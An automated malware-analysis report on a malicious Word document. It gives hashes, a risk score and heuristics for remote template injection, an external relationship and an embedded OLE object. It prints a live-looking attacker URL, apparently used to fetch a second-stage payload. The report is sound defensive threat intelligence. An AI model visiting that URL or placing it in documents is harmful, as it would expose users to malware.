Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 ad32b3e61d8d2fc9…

MALICIOUS

Office (OOXML) / .DOC

582.0 KB Created: 2025-08-04 07:55:00 UTC Authoring application: Microsoft Office Word 12.0000
MD5: a16e832d030f8f39cc39d65eda3ca77f SHA-1: 17d6e1c91f81886df68e3171f74f54c4f3e7967d SHA-256: ad32b3e61d8d2fc94bd69629b9f310d41c98934ec32c5aac8ac184a4e65e8d4b
80 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File

The file exhibits characteristics of a malicious OOXML document, specifically triggering heuristics for remote template injection and external relationships. The presence of an embedded OLE object further suggests malicious intent. The primary IOC is the remote template URL, which is likely used to fetch and execute a secondary payload. The document body was truncated and did not provide further context on the lure.

Heuristics 4

  • Remote template injection high OOXML_REMOTE_TEMPLATE
    Document references a remote template URL (https://wearethebestchoiceforebestpeopleswhogivenmebestthingsforcookingfoodforbes.dOcX=@link.emcdn.ru/3pFnsR) — a common remote-template-injection vector used by Hancitor, Emotet and many phishing campaigns. Word can fetch and apply the remote template; macros in that template may execute depending on Office policy and trust state.
  • External relationship medium OOXML_EXTERNAL_REL
    External target in word/_rels/settings.xml.rels: https://wearethebestchoiceforebestpeopleswhogivenmebestthingsforcookingfoodforbes.dOcX=@link.emcdn.ru/3pFnsR
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.openxmlformats.org/markup-compatibili

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
ooxml_oleobject_00.bin
1539b121802a2f49163fe863f2b37bfabc41c296731b3a5c5e03b49274376a66		 ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject1.bin 1811968 bytes
emf_00.emf
3866e82104462fcd5935c2b80919ef24421168e375d3c50cb367b1ab13df7bf6		 ooxml-emf OOXML EMF part: word/media/image1.emf 1413812 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.